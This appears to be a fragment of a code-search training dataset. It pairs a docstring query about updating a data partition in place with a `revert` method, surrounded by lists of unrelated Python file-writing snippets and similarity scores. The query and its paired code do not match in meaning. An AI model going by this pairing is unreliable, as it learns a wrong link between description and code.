i) for i, j in zip(offsets, offsets[1:])]\n\n for path, part_info, meta_path in zip(\n paths,\n partition_info,\n metadata_file_paths,\n ):\n if path in self.path_cw_map: # path is a currently open file\n cw_idx = self.path_cw_map[path]\n existing_cw_batch[cw_idx][path] = part_info\n else: # path not currently handled by any chunked writer\n new_cw_paths.append((path, part_info, meta_path))\n\n # Write out the parts of grouped_df currently handled by existing cw's\n for cw_idx, path_to_part_info_map in existing_cw_batch.items():\n cw = self._chunked_writers[cw_idx][0]\n # match found paths with this cw's paths and nullify partition info\n # for partition_col values not in this batch\n this_cw_part_info = [\n path_to_part_info_map.get(path, (0, 0))\n for path in self._chunked_writers[cw_idx][1]\n ]\n cw.write_table(grouped_df, this_cw_part_info)\n\n if new_cw_paths:\n # Create new cw for unhandled paths encountered in this write_table\n new_paths, part_info, meta_paths = 
zip(*new_cw_paths)\n self._chunked_writers.append(\n (\n ParquetWriter(new_paths, **self.common_args),\n new_paths,\n meta_paths,\n )\n )\n new_cw_idx = len(self._chunked_writers) - 1\n self.path_cw_map.update({k: new_cw_idx for k in new_paths})\n self._chunked_writers[-1][0].write_table(grouped_df, part_info)",
"def copy_to_temp(object):\n temp_file = NamedTemporaryFile(delete=False)\n _copy_and_close(object, temp_file)\n return temp_file.name",
"def _wipe(self):\n log_method_call(self, self.name, status=self.status)\n\n start = self.partedPartition.geometry.start\n part_len = self.partedPartition.geometry.end - start\n bs = self.partedPartition.geometry.device.sectorSize\n device = self.partedPartition.geometry.device.path\n\n # Erase 1MiB or to end of partition\n count = int(Size(\"1 MiB\") / bs)\n count = min(count, part_len)\n\n cmd = [\"dd\", \"if=/dev/zero\", \"of=%s\" % device, \"bs=%s\" % bs,\n \"seek=%s\" % start, \"count=%s\" % count]\n try:\n util.run_program(cmd)\n except OSError as e:\n log.error(str(e))\n finally:\n # If a udev device is created with the watch option, then\n # a change uevent is synthesized and we need to wait for\n # things to settle.\n udev.settle()",
"def pickle(array, file):\r\n\timport cPickle\r\n\tfo = open(file,'wb')\r\n\tcPickle.dump(array,fo)\r\n\tfo.close()",
"def deleteOutFiles(self, onlytmp=True):\n self.linkNodes()\n for node in self.sort():\n file = node.outputpath\n if (not onlytmp or file[0:4]=='tmp.'):\n logger.info(\"Deleting output file '%s'\" % file)\n dfs.delete(file)",
"def array(self):\n config = self.config\n\n unique_array = config[\"unique_subarray\"]\n\n p_axes = self.axes\n p_flip = self.flip\n p_part = self.part\n p_units = self.Units\n p_shape = self.shape\n p_location = self.location\n subarray = self._subarray\n\n len_p_axes = len(p_axes)\n\n if not self.in_memory:\n # --------------------------------------------------------\n # The subarray is not in memory.\n #\n # It could be in a file on disk or implied by a FileArray\n # object, etc.\n # --------------------------------------------------------\n self._original = self.copy()\n\n unique_array = True\n update = True\n copy = False\n\n if not p_part:\n indices = Ellipsis\n else:\n indices = tuple(p_part)\n\n # Read from a file into a numpy array\n p_data = subarray[indices]\n\n # We've just copied p_data from disk, so in place changes\n # are not possible\n in_place_changes = False\n else:\n # --------------------------------------------------------\n # The subarray is in memory\n # --------------------------------------------------------\n update = config[\"update\"]\n\n if p_part:\n p_data = get_subspace(subarray, p_part)\n elif not unique_array:\n p_data = subarray.view()\n else:\n p_data = subarray\n\n copy = config[\"extra_memory\"]\n\n # In place changes to p_data might be possible if we're not\n # copying the data\n in_place_changes = not copy\n\n if not p_data.ndim and isinstance(p_data, (numpy_number, numpy_bool_)):\n # --------------------------------------------------------\n # p_data is a numpy number (like numpy.int64) which does\n # not support assignment, so convert it to a numpy array.\n # --------------------------------------------------------\n p_data = numpy_array(p_data)\n # We've just copied p_data, so in place changes are\n # not possible\n copy = False\n in_place_changes = False\n\n masked = numpy_ma_isMA(p_data)\n if masked:\n # The p_data is a masked array\n if p_data.mask is numpy_ma_nomask or not numpy_ma_is_masked(\n p_data\n ):\n # There are no missing data points so recast as an\n # unmasked numpy array\n p_data = p_data.data\n masked = False\n # --- End: if\n\n if masked:\n # Set the hardness of the mask\n if config[\"hardmask\"]:\n p_data.harden_mask()\n else:\n p_data.soften_mask()\n # --- End: if\n\n self.masked = masked\n\n # ------------------------------------------------------------\n # Make sure that the data array has the correct units. This\n # process will deep copy the data array if required (e.g. 
if\n # another partition is referencing this numpy array), even if\n # the units are already correct.\n # ------------------------------------------------------------\n func = config.get(\"func\")\n units = config[\"units\"]\n if func is None:\n if not p_units.equals(units) and bool(p_units) is bool(units):\n func = Units.conform\n\n if func is not None:\n inplace = not copy\n p_data = func(p_data, p_units, units, inplace)\n p_units = units\n\n if not inplace:\n # We've just copied p_data, so in place changes are\n # not possible\n copy = False\n in_place_changes = False\n # --- End: if\n\n flip = config.get(\"flip\", None)\n if flip or p_flip:\n flip_axes = set(p_flip).symmetric_difference(flip)\n else:\n flip_axes = None\n\n axes = config[\"axes\"]\n\n if p_data.size > 1:\n # --------------------------------------------------------\n # Flip axes\n # --------------------------------------------------------\n if flip_axes:\n indices = [\n (\n slice(None, None, -1)\n if axis in flip_axes\n else slice(None)\n )\n for axis in p_axes\n ]\n p_data = p_data[tuple(indices)]\n\n # --------------------------------------------------------\n # Transpose axes\n # --------------------------------------------------------\n if p_axes != axes:\n iaxes = [p_axes.index(axis) for axis in axes if axis in p_axes]\n\n if len_p_axes > len(iaxes):\n for i in range(len_p_axes):\n if i not in iaxes:\n # iaxes.append(i)\n iaxes.insert(i, i)\n # --- End: if\n\n p_data = numpy_transpose(p_data, iaxes)\n # --- End: if\n\n # ------------------------------------------------------------\n # Remove excessive/insert missing size 1 axes\n # ------------------------------------------------------------\n if p_shape != p_data.shape:\n # if len_p_axes != len(p_shape):\n p_data = p_data.reshape(p_shape)\n\n # ------------------------------------------------------------\n # Apply the auxiliary mask\n # ------------------------------------------------------------\n auxiliary_mask = config[\"auxiliary_mask\"]\n if auxiliary_mask:\n for mask in auxiliary_mask:\n if mask.any():\n if not masked:\n p_data = p_data.view(numpy_ma_MaskedArray)\n masked = True\n\n p_data.mask = (mask | p_data.mask).array\n # --- End: for\n\n self.masked = True\n\n # ------------------------------------------------------------\n # Convert the array's data type\n # ------------------------------------------------------------\n p_dtype = p_data.dtype\n dtype = config.get(\"dtype\", None)\n if dtype is not None and dtype != p_dtype:\n try:\n p_data = p_data.astype(dtype) # Note: returns a copy\n except ValueError:\n raise ValueError(\n \"Can't recast partition array from {} to {}\".format(\n p_dtype.name, dtype.name\n )\n )\n else:\n # We've just copied p_data, so in place changes are\n # not possible\n copy = False\n in_place_changes = False\n # --- End: if\n\n # ------------------------------------------------------------\n # Copy the array\n # -----------------------------------------------------------\n if copy:\n if p_dtype.char != \"O\":\n if not masked or p_data.ndim > 0:\n p_data = p_data.copy()\n else:\n # This is because numpy.ma.copy doesn't work for\n # scalar arrays (at the moment, at least)\n p_data = numpy_ma_masked_all((), p_data.dtype)\n\n # We've just copied p_data, so in place changes are\n # not possible\n in_place_changes = False\n else:\n # whilst netCDF4.netcdftime.datetime is mucking bout,\n # don't copy!!!!\n # p_data = _copy(p_data)\n pass\n # --- End: if\n\n # ------------------------------------------------------------\n # Update the 
partition\n # ------------------------------------------------------------\n if update:\n self.subarray = p_data # ?? DCH CHECK\n self.Units = p_units\n self.part = []\n self.axes = axes\n self.flip = flip\n self.flatten = []\n self.shape = p_shape\n self.location = p_location\n\n self._in_place_changes = in_place_changes\n\n # ------------------------------------------------------------\n # Return the numpy array\n # ------------------------------------------------------------\n return p_data",
"def save(self, path):\n np.save(path, self.q)",
"def save_spike_position(spike_position, savepath):\n for key in spike_position:\n for idx in list(range(len(spike_position[key]))):\n spike_position[key][idx] = spike_position[key][idx].reshape((len(spike_position[key][idx]), 1))\n sio.savemat(savepath, {'spike_pos': spike_position})",
"def save(file, arr, allow_pickle=True, fix_imports=True):\n\n return numpy.save(file, array_create.array(arr, bohrium=False), allow_pickle, fix_imports)",
"def test_change_non_empty_dir_to_file(self):\n dir0, dir1 = self.make_temp_dirs(2)\n self.write_file(dir0, \"foo/bar\", \"baz\")\n self.sync_all()\n self.assertFile(dir0, \"foo/bar\", \"baz\")\n self.assertFile(dir1, \"foo/bar\", \"baz\")\n\n self.delete_file(dir0, \"foo/bar\")\n self.delete_dir(dir0, \"foo\")\n self.write_file(dir0, \"foo\", \"bar\")\n self.sync_all()\n self.assertFile(dir0, \"foo\", \"bar\")\n self.assertFile(dir1, \"foo\", \"bar\")",
"def writer(self, size=None):\n data_file = os.path.join(self.put_datadir, self._obj)\n\n # Assume the full directory path exists to the file already, and\n # construct the proper name for the temporary file.\n attempts = 1\n cur_thread = str(getcurrent())\n while True:\n postfix = md5(self._obj + _cur_host + _cur_pid + cur_thread\n + str(random.random())).hexdigest()\n tmpfile = '.' + self._obj + '.' + postfix\n tmppath = os.path.join(self.put_datadir, tmpfile)\n try:\n fd = do_open(tmppath,\n os.O_WRONLY | os.O_CREAT | os.O_EXCL | O_CLOEXEC)\n except GlusterFileSystemOSError as gerr:\n if gerr.errno == errno.ENOSPC:\n # Raise DiskFileNoSpace to be handled by upper layers\n raise DiskFileNoSpace()\n if gerr.errno not in (errno.ENOENT, errno.EEXIST, errno.EIO):\n # FIXME: Other cases we should handle?\n raise\n if attempts >= MAX_OPEN_ATTEMPTS:\n # We failed after N attempts to create the temporary\n # file.\n raise DiskFileError('DiskFile.mkstemp(): failed to'\n ' successfully create a temporary file'\n ' without running into a name conflict'\n ' after %d of %d attempts for: %s' % (\n attempts, MAX_OPEN_ATTEMPTS,\n data_file))\n if gerr.errno == errno.EEXIST:\n # Retry with a different random number.\n attempts += 1\n elif gerr.errno == errno.EIO:\n # FIXME: Possible FUSE issue or race condition, let's\n # sleep on it and retry the operation.\n _random_sleep()\n logging.warn(\"DiskFile.mkstemp(): %s ... retrying in\"\n \" 0.1 secs\", gerr)\n attempts += 1\n elif not self._obj_path:\n # No directory hierarchy and the create failed telling us\n # the container or volume directory does not exist. This\n # could be a FUSE issue or some race condition, so let's\n # sleep a bit and retry.\n _random_sleep()\n logging.warn(\"DiskFile.mkstemp(): %s ... retrying in\"\n \" 0.1 secs\", gerr)\n attempts += 1\n elif attempts > 1:\n # Got ENOENT after previously making the path. This could\n # also be a FUSE issue or some race condition, nap and\n # retry.\n _random_sleep()\n logging.warn(\"DiskFile.mkstemp(): %s ... retrying in\"\n \" 0.1 secs\" % gerr)\n attempts += 1\n else:\n # It looks like the path to the object does not already\n # exist; don't count this as an attempt, though, since\n # we perform the open() system call optimistically.\n self._create_dir_object(self._obj_path)\n else:\n break\n dw = None\n try:\n # Ensure it is properly owned before we make it available.\n do_fchown(fd, self.uid, self.gid)\n # NOTE: we do not perform the fallocate() call at all. We ignore\n # it completely.\n dw = DiskWriter(self, fd, tmppath, self.threadpool)\n yield dw\n finally:\n try:\n if dw.fd:\n do_close(dw.fd)\n except OSError:\n pass\n if dw.tmppath:\n do_unlink(dw.tmppath)",
"def save(self, patch):\n internalSlices = self._get_internal_slices(patch.slices)\n self.array[internalSlices] = patch.array",
"def save_prime_array(number_of_primes) -> None:\n p = prime_array(number_of_primes)\n with open(f'prime{number_of_primes}.bin', 'wb') as prime_file:\n p.tofile(prime_file)\n \n return None",
"def test_save_trajectory_dataset():\n import tempfile\n import MDAnalysis.coordinates\n\n pdb_file_path = os.path.join(os.path.dirname(__file__), 'data', 'chloro-fluoromethane.pdb')\n\n # Load the test PDB file.\n with MDAnalysis.coordinates.PDB.PDBReader(pdb_file_path) as trajectory:\n\n # Create a nested subset of a TrajectoryDataset.\n dataset = TrajectoryDataset(trajectory)\n nested_subset = TrajectorySubset(dataset, indices=[0, 2, 4])\n subset = TrajectorySubset(nested_subset, indices=[0, 2])\n\n for d, indices in [\n (dataset, range(len(trajectory))),\n (subset, [0, 4])\n ]:\n for custom_positions in [\n None,\n _random_state.randn(len(d), trajectory.n_atoms, 3) * 10\n ]:\n # We write the file in a temporary location.\n temp_file_path = None\n try:\n f = tempfile.NamedTemporaryFile(delete=True, suffix='.pdb')\n temp_file_path = f.name\n f.close()\n\n d.save(\n pdb_file_path,\n output_file_path=temp_file_path,\n positions=custom_positions,\n multiframe=True\n )\n\n # Check that the function has saved the correct positions/frames.\n if custom_positions is None:\n _check_saved_trajectory(temp_file_path, dataset, indices=indices)\n else:\n _check_saved_trajectory(temp_file_path, custom_positions)\n\n # Check also that writing custom positions leave the original data intact.\n for saved_idx, reference_idx in enumerate(indices):\n original_positions = dataset.get_ts(reference_idx).positions\n assert not np.allclose(original_positions, custom_positions[saved_idx],\n atol=1e-2, rtol=0.0)\n finally:\n # Make sure the temporary file is deleted.\n if temp_file_path is not None:\n os.unlink(temp_file_path)",
"def write_to_local(path, data_rec):\n path, filename = os.path.split(path)\n with open(filename, 'wb') as f:\n f.write(data_rec)\n f.close()",
"def test_custom_local_output_file_with_overwrite() -> None:\n with tempfile.TemporaryDirectory() as tmpdirname:\n output_file_location = os.path.join(tmpdirname, \"foo.txt\")\n\n # Create a file in the temporary directory\n with open(output_file_location, \"wb\") as write_file:\n write_file.write(b\"foo\")\n\n # Instantiate an output file\n output_file = PyArrowFileIO().new_output(location=f\"{output_file_location}\")\n\n # Confirm that a FileExistsError is raised when overwrite=False\n with pytest.raises(FileExistsError):\n f = output_file.create(overwrite=False)\n f.write(b\"foo\")\n\n # Confirm that the file is overwritten with overwrite=True\n f = output_file.create(overwrite=True)\n f.write(b\"bar\")\n with open(output_file_location, \"rb\") as f:\n assert f.read() == b\"bar\"",
"def dump_to_tmpfile(obj):\n\n import tempfile\n\n fname = tempfile.mktemp()\n with open(fname, \"w\") as txtfile:\n txtfile.write(str(obj))\n\n print(\"str(obj) was written to {}\".format(fname))\n\n return fname",
"def write_torque_table(A, filename):\n f = open(filename, 'w')\n for row in range(np.size(A, axis=0)):\n A[row,:].tofile(f, sep=',')\n f.write('\\n')\n f.close()",
"def create_test_file(filename, array):\n array = np.ma.asanyarray(array)\n crs = rasterio.crs.CRS(init='epsg:4326')\n transform = from_origin(52, 4, 10, 10)\n with rasterio.open(\n filename,\n mode='w',\n driver='GTiff',\n width=array.shape[1],\n height=array.shape[2],\n count=array.shape[0],\n dtype=array.dtype,\n crs=crs,\n transform=transform) as dataset:\n for band, data in enumerate(array, start=1):\n dataset.write(data, band)",
"def save_to_file(content, song_name):\n file = open(\"./assets/homemade_partitions.txt\", \"a+\")\n # Move to the start of the file\n file.seek(0)\n # Read the total lines\n total_lines = len(file.readlines())\n # Move to the end of the file\n file.seek(0, 2)\n # Write the song's name\n file.write(f\"#{int(total_lines / 2 + 1)} {song_name}\\n\")\n # Write the song's partition\n file.write(content + \"\\n\")\n file.close()",
"def write(self, filename, text):\r\n self._call(\"-rm\", filename)\r\n with temporary_file() as fp:\r\n fp.write(text)\r\n fp.flush()\r\n return self._call('-copyFromLocal', fp.name, filename)",
"def test_write_file_to_disk_str(self):\r\n file_data = 'A' * 100\r\n write_file_to_disk(self.test_file3, file_data)\r\n self.file_contents_is_equal(self.test_file3, file_data)",
"def _generate_to_tempfile(self, generator):\r\n (output_fd, output_path) = tempfile.mkstemp()\r\n with os.fdopen(output_fd, 'w') as output:\r\n generator.write(output)\r\n return output_path",
"def copy_to_temp(self,\r\n index,\r\n tempobject):\r\n\r\n tempobject.load(index,\r\n self.get_note(index))\r\n self.display_buffer.append(index_reduce(str(index))+alerts.COPIED_TO_TEMP)",
"def test_file_writing_multiple_points_at_once_two_steps_recarray_input(\n self):\n with IndexedRaggedTs(self.testfilename, n_loc=4, mode=\"w\") as dataset:\n locations = np.array([1, 1, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3])\n data = {\n \"test\":\n np.concatenate([np.arange(2),\n np.arange(5),\n np.arange(6)])\n }\n dates = []\n for n_data in [2, 5, 6]:\n base = datetime(2007, 1, n_data)\n dates.append(\n np.array(\n [base + timedelta(hours=i) for i in range(n_data)]))\n dates = np.concatenate(dates)\n data = np.array(data[\"test\"],\n dtype={\n \"names\": [\"test\"],\n \"formats\": [\"i8\"]\n })\n dataset.write(locations,\n data,\n dates,\n loc_descr=[\"first station\"] * 13,\n lon=locations,\n lat=locations,\n alt=locations)\n\n with IndexedRaggedTs(self.testfilename, n_loc=4, mode=\"a\") as dataset:\n locations = np.array([1, 1, 4, 4])\n data = {\"test\": np.concatenate([np.arange(2), np.arange(2)])}\n dates = []\n for n_data in [2, 2]:\n base = datetime(2007, 2, n_data)\n dates.append(\n np.array(\n [base + timedelta(hours=i) for i in range(n_data)]))\n dates = np.concatenate(dates)\n\n data = np.array(data[\"test\"],\n dtype={\n \"names\": [\"test\"],\n \"formats\": [\"i8\"]\n })\n dataset.write(locations,\n data,\n dates,\n loc_descr=[\"first station\"] * 4,\n lon=locations,\n lat=locations,\n alt=locations)\n\n with IndexedRaggedTs(self.testfilename) as dataset:\n for gpis, n_data, base_month in zip([1, 2, 3, 4], [2, 5, 6, 2],\n [1, 1, 1, 2]):\n data = dataset.read_all(gpis)\n if gpis == 1:\n nptest.assert_array_equal(\n data[\"test\"],\n np.concatenate([np.arange(n_data),\n np.arange(n_data)]))\n else:\n nptest.assert_array_equal(data[\"test\"], np.arange(n_data))\n test_dates = []\n base = datetime(2007, base_month, n_data)\n test_dates.append(\n np.array(\n [base + timedelta(hours=i) for i in range(n_data)]))\n if gpis == 1:\n base = datetime(2007, 2, n_data)\n test_dates.append(\n np.array([\n base + timedelta(hours=i) for i in range(n_data)\n ]))\n\n dates = np.concatenate(test_dates)\n nptest.assert_array_equal(data[\"time\"], dates)",
"def compact(self):\n\n # create a collection list for each bucket\n bucket_to_list_node_dict = {}\n # we need to ensure all buckets should have a collection list\n for bucket in self._buckets:\n bucket_to_list_node_dict[bucket] = []\n for node in self._disk_objects:\n bucket_object = node.value\n assert not bucket_object.is_in_memory()\n bucket_to_list_node_dict[bucket_object.bucket].append(node)\n # bucket by bucket processing\n for bucket, node_list in bucket_to_list_node_dict.items():\n with open(bucket.filepath, \"rb\") as source_file:\n tmp_filepath = bucket.filepath + \".tmp\"\n tmp_offset, tmp_addresses = 0, []\n with open(tmp_filepath, \"wb\") as target_file:\n # copy bytes from filepath to tmp_filepath\n for node in node_list:\n bucket_object = node.value\n source_file.seek(bucket_object.value.address)\n header = source_file.read(4)\n data_length = self._byte_array_to_integer(header)\n data = source_file.read(data_length)\n target_file.write(header + data)\n tmp_addresses.append(tmp_offset)\n tmp_offset += len(header + data)\n # swap files in physical disk\n os.rename(tmp_filepath, bucket.filepath)\n # remove all bucket_object from object_to_list_node dict\n for node in node_list:\n self._object_to_list_node.pop(node.value)\n # update disk address and object_to_list_node dict\n for node, address in zip(node_list, tmp_addresses):\n bucket_object = node.value\n bucket_object.value.address = address\n self._object_to_list_node[bucket_object] = node\n # update bucket's offset, very important in compaction\n bucket._offset = tmp_offset",
"def _create_sparsed_file(self, nms, path, size):\n nms.appliance.execute(\n 'truncate --size %(size)dG %(path)s' % {\n 'path': path,\n 'size': size\n }\n )",
"def numpy_2_file(narray, file, path=OUTPUT_PATH, sep=',' ):\n file_path = path + file\n narrayc = numpy.copy(narray)\n numpy.place(narrayc,numpy.logical_or(narrayc==-1,narrayc==-2), 2)\n dataset = numpy.copy(narrayc).astype(str)\n numpy.place(dataset,dataset=='2', '*')\n d=numpy.atleast_2d(dataset)\n numpy.savetxt(file_path, d, delimiter=sep, fmt='%s')\n return",
"def write_pickle_object_to_file(self, inpobj):\n with gzip.open('%s.tmp' % self.pickle_file, 'wb') as pkl_file:\n pickle.dump(inpobj, pkl_file, pickle.HIGHEST_PROTOCOL)\n run_command('mv %s.tmp %s' % (self.pickle_file, self.pickle_file))\n return True",
"def output_file(newarray, filename):\n np.savetxt(filename + \"_formatted.txt\", newarray, delimiter=\" \", fmt=\"%s\")",
"def truncate(data_path: str, n_chunks: int, idx=0):\n lines = open(data_path, 'r').readlines()\n n = len(lines)\n print('{} lines in original dataset'.format(n))\n chunk_size = round(len(lines) / int(n_chunks))\n print('{} lines in truncated dataset'.format(chunk_size))\n # get to idx block (so idx * x)\n start_id = idx * chunk_size\n output = lines[start_id:start_id+chunk_size]\n # write the next x lines in the output file (done)\n with open('trunc{}p_{}'.format(n_chunks, data_path), 'w') as out:\n for l in output:\n out.write(l)"
] | [
"0.58671135",
"0.56434155",
"0.5580373",
"0.5417111",
"0.5385665",
"0.5372569",
"0.53123814",
"0.52139175",
"0.5193834",
"0.51137465",
"0.5101339",
"0.5099379",
"0.50423723",
"0.5027432",
"0.50095487",
"0.5004623",
"0.49991313",
"0.4995337",
"0.49318588",
"0.49247873",
"0.4896562",
"0.48937136",
"0.48899746",
"0.48796624",
"0.48620802",
"0.48261485",
"0.48148912",
"0.47867736",
"0.4782684",
"0.477437",
"0.47739702",
"0.47738385",
"0.4769095",
"0.4763525",
"0.47622937",
"0.4759557",
"0.4751665",
"0.47383544",
"0.47241423",
"0.47106767",
"0.47092134",
"0.47032487",
"0.4698778",
"0.4675477",
"0.467135",
"0.46627998",
"0.46620122",
"0.46605238",
"0.46597573",
"0.4651026",
"0.46350136",
"0.46334973",
"0.46317053",
"0.46288842",
"0.46239078",
"0.4622872",
"0.4617189",
"0.46169776",
"0.46063033",
"0.46062872",
"0.46036565",
"0.46012673",
"0.4597424",
"0.45851782",
"0.45831677",
"0.4576443",
"0.4576244",
"0.4574653",
"0.45746404",
"0.4573864",
"0.45729882",
"0.45715222",
"0.45694488",
"0.45692518",
"0.45596611",
"0.4551125",
"0.45426592",
"0.45369437",
"0.4535683",
"0.4533931",
"0.45280266",
"0.45250997",
"0.45243233",
"0.45214406",
"0.45179743",
"0.4514823",
"0.45076314",
"0.45021644",
"0.44962186",
"0.44953623",
"0.44880113",
"0.44818914",
"0.44801918",
"0.447523",
"0.44725376",
"0.4468557",
"0.4468355",
"0.44640532",
"0.44591728",
"0.44587877"
] | 0.6427523 | 0 |
Completely update the partition with another partition's attributes in place. The updated partition is always dependent on the other partition. | def revert(self):
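# Restore this partition's state from the stashed "_original" copy, if one exists.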
original = getattr(self, "_original", None)
if not original:
return
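# Preserve any existing "output" attribute so it survives the reversion.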
if hasattr(self, "output"):
output = self.output
keep_output = True
else:
keep_output = False
del self._original
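# Swap the original partition's attributes back in wholesale.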
self.__dict__ = original.__dict__
if keep_output:
self.output = output | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def update(self, metadata):\n p_metas = metadata.partitions\n\n # Remove old partitions\n removed = set(self._partitions.keys()) - set(p_metas.keys())\n if len(removed) > 0:\n log.info('Removing %d partitions', len(removed))\n for id_ in removed:\n log.debug('Removing partition %s', self._partitions[id_])\n self._partitions.pop(id_)\n\n # Add/update current partitions\n brokers = self._cluster.brokers\n if len(p_metas) > 0:\n log.info(\"Adding %d partitions\", len(p_metas))\n for id_, meta in iteritems(p_metas):\n if meta.leader not in brokers:\n raise LeaderNotAvailable()\n if meta.id not in self._partitions:\n log.debug('Adding partition %s/%s', self.name, meta.id)\n self._partitions[meta.id] = Partition(\n self, meta.id,\n brokers[meta.leader],\n [brokers[b] for b in meta.replicas],\n [brokers[b] for b in meta.isr],\n )\n else:\n self._partitions[id_].update(brokers, meta)",
"def update_partition(self, event) -> None:\n self.min_width = 150 * len(self.partition)\n self.request_update()",
"def _setPartedPartition(self, partition):\n log_method_call(self, self.name)\n\n if partition is not None and not isinstance(partition, parted.Partition):\n raise ValueError(\"partition must be None or a parted.Partition instance\")\n\n log.debug(\"device %s new partedPartition %s\", self.name, partition)\n self._partedPartition = partition\n self.updateName()",
"def partition2(self, partition2):\n\n self._partition2 = partition2",
"def update_partition(self, bulk_ad_group_product_partition):\n\n if bulk_ad_group_product_partition is not None and bulk_ad_group_product_partition.ad_group_criterion is not None:\n bulk_ad_group_product_partition.ad_group_criterion.AdGroupId=self._ad_group_id\n bulk_ad_group_product_partition.ad_group_criterion.Status=None\n if hasattr(bulk_ad_group_product_partition.ad_group_criterion, 'EditorialStatus'):\n bulk_ad_group_product_partition.ad_group_criterion.EditorialStatus=None\n self._partition_actions.append(bulk_ad_group_product_partition)",
"def update(self, instance, validated_data):\n for attr, value in list(validated_data.items()):\n if attr == 'part_details':\n for a, v in list(value.items()):\n setattr(instance.part_details, attr, value)\n else:\n setattr(instance, attr, value)\n instance.save()\n return instance",
"def update_part(session=None, data=None):\n data_dict = format_and_check_update_part_request(data)\n if data_dict is None:\n return False\n\n with mc.MCSessionWrapper(session=session) as session:\n for dkey, dval in data_dict.items():\n hpn_to_change = dval[0][0]\n rev_to_change = dval[0][1]\n part_rec = session.query(Parts).filter(\n (func.upper(Parts.hpn) == hpn_to_change.upper())\n & (func.upper(Parts.hpn_rev) == rev_to_change.upper())\n )\n num_part = part_rec.count()\n if num_part == 0:\n part = Parts()\n elif num_part == 1:\n part = part_rec.first()\n set_an_attrib = False\n for d in dval:\n try:\n getattr(part, d[2])\n setattr(part, d[2], d[3])\n set_an_attrib = True\n except AttributeError:\n print(d[2], \"does not exist as a field\")\n continue\n if set_an_attrib:\n session.add(part)\n session.commit()\n cm_utils.log(\"cm_partconnect part update\", data_dict=data_dict)\n\n return True",
"def PatchPartition(self, target, source, patch):\n self._CheckSecondTokenNotSlotSuffixed(target, \"PatchPartitionExpr\")\n self._CheckSecondTokenNotSlotSuffixed(source, \"PatchPartitionExpr\")\n self.PatchPartitionExpr('\"%s\"' % target, '\"%s\"' % source, '\"%s\"' % patch)",
"def _computeResize(self, partition, newsize=None):\n log_method_call(self, self.name, status=self.status)\n\n if newsize is None:\n newsize = self.targetSize\n\n # compute new size for partition\n currentGeom = partition.geometry\n currentDev = currentGeom.device\n newLen = int(newsize) / currentDev.sectorSize\n newGeometry = parted.Geometry(device=currentDev,\n start=currentGeom.start,\n length=newLen)\n # and align the end sector\n if newGeometry.length < currentGeom.length:\n align = self.disk.format.endAlignment.alignUp\n alignGeom = currentGeom # we can align up into the old geometry\n else:\n align = self.disk.format.endAlignment.alignDown\n alignGeom = newGeometry\n\n newGeometry.end = align(alignGeom, newGeometry.end)\n constraint = parted.Constraint(exactGeom=newGeometry)\n\n return (constraint, newGeometry)",
"def update(self):\n #self._switch.odlclient._request_json(self._path, method=\"put\", json={\n # \"flow\": self._odl_inventory()\n #})\n self.remove() # actually, remove only uses self.switch and self.id, so this removes the other entry as well.\n self.deploy()",
"def disk_update(context, disk_id, values):\n return NotImplemented",
"def preCommitFixup(self):\n log_method_call(self, self.name)\n if not self.exists or not self.disklabelSupported:\n return\n\n # find the correct partition on the original parted.Disk since the\n # name/number we're now using may no longer match\n _disklabel = self.disk.originalFormat\n\n if self.isExtended:\n # getPartitionBySector doesn't work on extended partitions\n _partition = _disklabel.extendedPartition\n log.debug(\"extended lookup found partition %s\",\n devicePathToName(getattr(_partition, \"path\", None) or \"(none)\"))\n else:\n # lookup the partition by sector to avoid the renumbering\n # nonsense entirely\n _sector = self.partedPartition.geometry.start\n _partition = _disklabel.partedDisk.getPartitionBySector(_sector)\n log.debug(\"sector-based lookup found partition %s\",\n devicePathToName(getattr(_partition, \"path\", None) or \"(none)\"))\n\n self.partedPartition = _partition",
"def partition1(self, partition1):\n\n self._partition1 = partition1",
"def _setSize(self, newsize):\n log_method_call(self, self.name,\n status=self.status, size=self._size, newsize=newsize)\n if not isinstance(newsize, Size):\n raise ValueError(\"new size must of type Size\")\n\n if not self.exists:\n # device does not exist (a partition request), just set basic values\n self._size = newsize\n self.req_size = newsize\n self.req_base_size = newsize\n\n if self.exists:\n super(PartitionDevice, self)._setSize(newsize)\n return\n\n # the rest is for changing the size of an allocated-but-not-existing\n # partition, which I'm not sure is advisable\n if self.disk and newsize > self.disk.size:\n raise ValueError(\"partition size would exceed disk size\")\n\n if not self.partedPartition:\n log.warn(\"No partedPartition, not adjusting geometry\")\n return\n\n maxAvailableSize = Size(self.partedPartition.getMaxAvailableSize(unit=\"B\"))\n\n if newsize > maxAvailableSize:\n raise ValueError(\"new size is greater than available space\")\n\n # now convert the size to sectors and update the geometry\n geometry = self.partedPartition.geometry\n physicalSectorSize = geometry.device.physicalSectorSize\n\n new_length = int(newsize) / physicalSectorSize\n geometry.length = new_length",
"def _lock_partition(self, partition, shared=False):\n pass",
"def _update(self, device=None):\n self._attr_available = True\n self.schedule_update_ha_state(True)",
"def update(self):\n self.attributes = self.call('UPDATE', expect=error.OK, body=self.attributes)",
"def test_partial_updates(self):\r\n m1 = TestSetModel.create(int_set={1, 2, 3, 4})\r\n\r\n m1.int_set.add(5)\r\n m1.int_set.remove(1)\r\n assert m1.int_set == {2, 3, 4, 5}\r\n\r\n m1.save()\r\n\r\n m2 = TestSetModel.get(partition=m1.partition)\r\n assert m2.int_set == {2, 3, 4, 5}",
"def update(self, other):\n b = self.hallucinate_merge(other)\n self.l_child = b.l_child\n self.r_child = b.r_child",
"def set_partition(self, begin=0, end=0):\r\n self.partition = (begin, end)",
"def on_partition_change(self, new_partitions):\n if new_partitions is None:\n self.conn.create(self.partition_path, value=self.partitions)\n return\n\n if new_partitions != self.partitions:\n self.partitions = new_partitions\n self.rebalance()\n\n self.partitions_collected.set()",
"def update(self, other):\n self._start = other._start\n self._end = other._end\n self._nodes = {k: v.copy() for k,v in other._nodes.iteritems()}\n self._edges = {k: set(v) for k,v in other._edges.iteritems()}\n self._names = set(other._names)\n self.current = other.current",
"def soft_update(self, other, tau):\n new_weights = {}\n\n own_weights = self.get_weight_copies()\n other_weights = other.get_weight_copies()\n\n for k in own_weights:\n #print(own_weights[k].shape, other_weights[k].shape)\n new_weights[k] = (1 - tau) * own_weights[k] + tau * other_weights[k]\n self.set_weights(new_weights)",
"def partitioning_attribute(self, partitioning_attribute):\n\n self._partitioning_attribute = partitioning_attribute",
